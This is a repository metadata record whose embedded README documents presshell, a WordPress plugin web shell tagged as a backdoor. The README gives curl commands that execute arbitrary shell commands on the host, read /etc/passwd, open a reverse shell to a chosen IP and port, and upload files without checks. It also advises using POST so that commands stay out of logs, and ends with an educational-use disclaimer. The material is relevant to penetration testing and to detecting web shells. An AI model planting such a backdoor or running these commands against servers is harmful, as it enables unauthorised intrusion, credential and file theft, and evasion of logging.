{"id":13844928,"url":"https://github.com/scheatkode/presshell","last_synced_at":"2025-07-12T00:32:24.010Z","repository":{"id":44724563,"uuid":"449674513","full_name":"scheatkode/presshell","owner":"scheatkode","description":"🚪 Quick \u0026 dirty Wordpress Command Execution Shell","archived":false,"fork":true,"pushed_at":"2022-01-24T21:55:11.000Z","size":107,"stargazers_count":67,"open_issues_count":0,"forks_count":9,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-08-05T17:43:26.983Z","etag":null,"topics":["backdoor","pentest","php","remote-code-execution","wordpress","wordpress-plugin"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"leonjza/wordpress-shell","license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/scheatkode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-01-19T12:04:00.000Z","updated_at":"2024-07-12T11:11:52.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/scheatkode/presshell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/scheatkode","download_url":"https://codeload.github.com/scheatkode/presshell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772808,"owners_count":17521894,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","pentest","php","remote-code-execution","wordpress","wordpress-plugin"],"created_at":"2024-08-04T17:03:03.563Z","updated_at":"2024-11-21T17:31:00.314Z","avatar_url":"https://github.com/scheatkode.png","language":"PHP","readme":"\u003cp align='center'\u003e\n   \u003cimg src='.assets/backdoor.png' alt='' width='256' /\u003e\n\u003c/p\u003e\n\n\u003ch2 align='center'\u003epresshell\u003c/h2\u003e\n\n\u003cp align='center'\u003e\u003ci\u003eQuick \u0026 dirty Wordpress Command Execution Shell.\u003c/i\u003e\u003c/p\u003e\n\nExecute shell  commands on  your wordpress  server. Uploaded  shell will\nprobably be at `\u003cyour-host\u003e/wp-content/plugins/shell/shell.php`\n\n### Installation\n\nTo install the shell, we are  assuming you have administrative rights to\nWordpress and can  install plugins since transferring a PHP  file to the\nmedia  library  shouldn't work  anyway.  Otherwise,  you have  a  bigger\nproblem.\n\nSimply upload  the zip  file located  in the Releases  section as  a new\nextension and you're good to go.\n\n### Usage\n\nUsing  the shell  is straightforward.  Simply pass  `sh` commands  as an\nargument to the shell :\n\n```sh\n❯ curl 'http://host/.../shell.php?cmd=uname+-a'\nLinux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux\n```\n\nYou may  as well pass  these arguments in a  POST request, which  is the\nrecommended way to keep your commands out of logs.\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'\nLICENSE\nREADME.md\nshell.php\n```\n\nMore complex  commands are  also supported,  careful about  your quoting\nthough.\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=cat /etc/passwd | grep -v \"\\(false\\|nologin\\)\"'\nroot:x:0:0:root:/root:/bin/bash\nsync:x:4:65534:sync:/bin:/bin/sync\n```\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=python -c \"from urllib.parse import urlencode; print(urlencode({\\\"cmd\\\": \\\"uname -a\\\"}))\"'\ncmd=uname+-a\n```\n\nYou can also open a reverse  shell using the `ip` and `port` parameters.\nThe default port is `443`.\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'ip=127.0.0.1'\n```\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'ip=127.0.0.1' --data-urlencode 'port=1337'\n```\n\nThere is also an option provided for convenience to upload a file to the\ndirectory of the plugin *unconditionally and without checks*.\n\n```sh\n❯ curl 'http://host/.../shell.php' -F 'file=@some_file'\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'\nLICENSE\nREADME.md\nshell.php\nsome_file\n```\n\n### Disclaimer\n\nRunning unathorized attacks to public or private servers is illegal. The\ncontent  of this  repository is  for  educational purposes  only and  no\nresponsibility will be  taken by the authors  in case of ill  use of the\nprovided material.\n","funding_links":[],"categories":["PHP"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fscheatkode%2Fpresshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fscheatkode%2Fpresshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fscheatkode%2Fpresshell/lists"}